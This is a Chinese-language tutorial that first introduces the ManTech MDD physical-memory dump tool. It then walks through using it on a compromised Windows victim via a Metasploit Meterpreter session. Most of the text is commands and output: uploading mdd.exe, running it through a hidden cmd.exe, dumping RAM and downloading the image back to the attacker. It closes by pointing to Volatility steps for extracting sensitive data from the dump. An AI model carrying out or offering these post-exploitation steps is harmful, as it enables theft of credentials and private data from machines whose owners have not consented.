ManTech MDD(http://www.mantech.com/msma/MDD.asp))是遵循GPL协议发布的,MDD可以复制以下微软操作系统内存的所有内容:WINDOWS 2000, Windows XP, Windows 2003 Server, Windows 2008 Server。
从ManTech网站下载MDD后,你必须使用命令行来运行MDD程序。
MDD命令行用法
| mdd -o 输出文件名 |
例如:
| C:\tools\mdd> mdd -o memory.dd -> mdd -> ManTech Physical Memory Dump Utility Copyright (C) 2008 ManTech Security & Mission Assurance -> This program comes with ABSOLUTELY NO WARRANTY; for details use option `-w’ This is free software, and you are welcome to redistribute it under certain conditions; use option `-c’ for details. -> Dumping 255.48 MB of physical memory to file ‘memory.dd’. 65404 map operations succeeded (1.00) 0 map operations failed took 21 seconds to write MD5 is: a48986bb0558498684414e9399ca19fc |
输出文件通常都会涉及镜像,MDD的功能仅限于复制物理内存,所以必须利用其他工具来分析内存镜像。
这里我们使用Metasploit Meterpreter和MDD共同来完成下面的工作。
首先需要更新MDD。
| meterpreter > upload /root/mdd.exe . [*] uploading : /root/mdd.exe -> . [*] uploaded : /root/mdd.exe -> .\mdd.exe meterpreter > ls Listing: c:\ ============ Mode Size Type Last modified Name —- —- —- ————- —- 100777 /rwxrwxrwx 0 fil Thu Jan 01 00:00:00 +0000 1970 AUTOEXEC.BAT 100666 /rw-rw-rw- 0 fil Thu Jan 01 00:00:00 +0000 1970 CONFIG.SYS 40777 /rwxrwxrwx 0 dir Thu Jan 01 00:00:00 +0000 1970 Documents and Settings 100444 /r–r–r– 0 fil Thu Jan 01 00:00:00 +0000 1970 IO.SYS 100444 /r–r–r– 0 fil Thu Jan 01 00:00:00 +0000 1970 MSDOS.SYS 100555 /r-xr-xr-x 45124 fil Thu Jan 01 00:00:00 +0000 1970 NTDETECT.COM 40555 /r-xr-xr-x 0 dir Thu Jan 01 00:00:00 +0000 1970 Program Files 40777 /rwxrwxrwx 0 dir Thu Jan 01 00:00:00 +0000 1970 System Volume Information 40777 /rwxrwxrwx 0 dir Thu Jan 01 00:00:00 +0000 1970 WINDOWS 100666 /rw-rw-rw- 194 fil Thu Jan 01 00:00:00 +0000 1970 boot.ini 100777 /rwxrwxrwx 95104 fil Thu Jan 01 00:00:00 +0000 1970 mdd.exe 100444 /r–r–r– 222368 fil Thu Jan 01 00:00:00 +0000 1970 ntldr 100666 /rw-rw-rw- 402653184 fil Thu Jan 01 00:00:00 +0000 1970 pagefile.sys |
在被攻击者的机器上执行MDD来获得RAM信息
| meterpreter > execute -f “cmd.exe” -i -H Process 1908 created. Channel 2 created. Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. c:\> mdd.exe -o memory.dd mdd.exe -o memory.dd -> mdd -> ManTech Physical Memory Dump Utility Copyright (C) 2008 ManTech Security & Mission Assurance -> This program comes with ABSOLUTELY NO WARRANTY; for details use option `-w’ This is free software, and you are welcome to redistribute it under certain conditions; use option `-c’ for details. -> Dumping 511.48 MB of physical memory to file ‘memory.dd’. 130940 map operations succeeded (1.00) 0 map operations failed took 23 seconds to write MD5 is: be9d1d906fac99fa01782e847a1c3144 |
这里,我们只需要毫不费力的运行工具,所需的数据将会被捕获下来。
| meterpreter > execute -f mdd.exe -a “-o demo.dd” Process 3436 created. |
我们需要证实内存镜像已被捕获。
| meterpreter > ls Listing: C:\ ============ Mode Size Type Last modified Name —- —- —- ————- —- 100666/rw-rw-rw- 537604934 fil Wed Dec 31 19:00:00 -0500 1969 92010NT_Disk2.zip 100777/rwxrwxrwx 0 fil Wed Dec 31 19:00:00 -0500 1969 AUTOEXEC.BAT 100666/rw-rw-rw- 0 fil Wed Dec 31 19:00:00 -0500 1969 CONFIG.SYS 40777/rwxrwxrwx 0 dir Wed Dec 31 19:00:00 -0500 1969 Config.Msi 40777/rwxrwxrwx 0 dir Wed Dec 31 19:00:00 -0500 1969 Documents and Settings 40777/rwxrwxrwx 0 dir Wed Dec 31 19:00:00 -0500 1969 GetAd2 100666/rw-rw-rw- 15642 fil Wed Dec 31 19:00:00 -0500 1969 GetAd2.zip 100444/r–r–r– 0 fil Wed Dec 31 19:00:00 -0500 1969 IO.SYS 40777/rwxrwxrwx 0 dir Wed Dec 31 19:00:00 -0500 1969 Inetpub 100444/r–r–r– 0 fil Wed Dec 31 19:00:00 -0500 1969 MSDOS.SYS 100555/r-xr-xr-x 47580 fil Wed Dec 31 19:00:00 -0500 1969 NTDETECT.COM 40777/rwxrwxrwx 0 dir Wed Dec 31 19:00:00 -0500 1969 PortQryV2 40555/r-xr-xr-x 0 dir Wed Dec 31 19:00:00 -0500 1969 Program Files 40777/rwxrwxrwx 0 dir Wed Dec 31 19:00:00 -0500 1969 RECYCLER 40777/rwxrwxrwx 0 dir Wed Dec 31 19:00:00 -0500 1969 System Volume Information 40777/rwxrwxrwx 0 dir Wed Dec 31 19:00:00 -0500 1969 WINDOWS 100666/rw-rw-rw- 146 fil Wed Dec 31 19:00:00 -0500 1969 YServer.txt 100666/rw-rw-rw- 194 fil Wed Dec 31 19:00:00 -0500 1969 boot.ini 100666/rw-rw-rw- 133677056 fil Wed Dec 31 19:00:00 -0500 1969 demo.dd 100777/rwxrwxrwx 95104 fil Wed Dec 31 19:00:00 -0500 1969 mdd.exe 100444/r–r–r– 233632 fil Wed Dec 31 19:00:00 -0500 1969 ntldr 100666/rw-rw-rw- 402653184 fil Wed Dec 31 19:00:00 -0500 1969 pagefile.sys 40777/rwxrwxrwx 0 dir Wed Dec 31 19:00:00 -0500 1969 passwordcrackers 40777/rwxrwxrwx 0 dir Wed Dec 31 19:00:00 -0500 1969 share 100777/rwxrwxrwx 869 fil Wed Dec 31 19:00:00 -0500 1969 update.exe Download memory dump using Meterpreter. meterpreter > download memory.dd . [*] downloading: memory.dd -> . [*] downloaded : memory.dd -> ./demo.dd meterpreter > |
我们已得到了.dd的本地映像,现在就可以利用http://forensiczone.blogspot.com/2009/01/using-volatility-1.html提供的操作步骤来获取内存中的敏感信息。
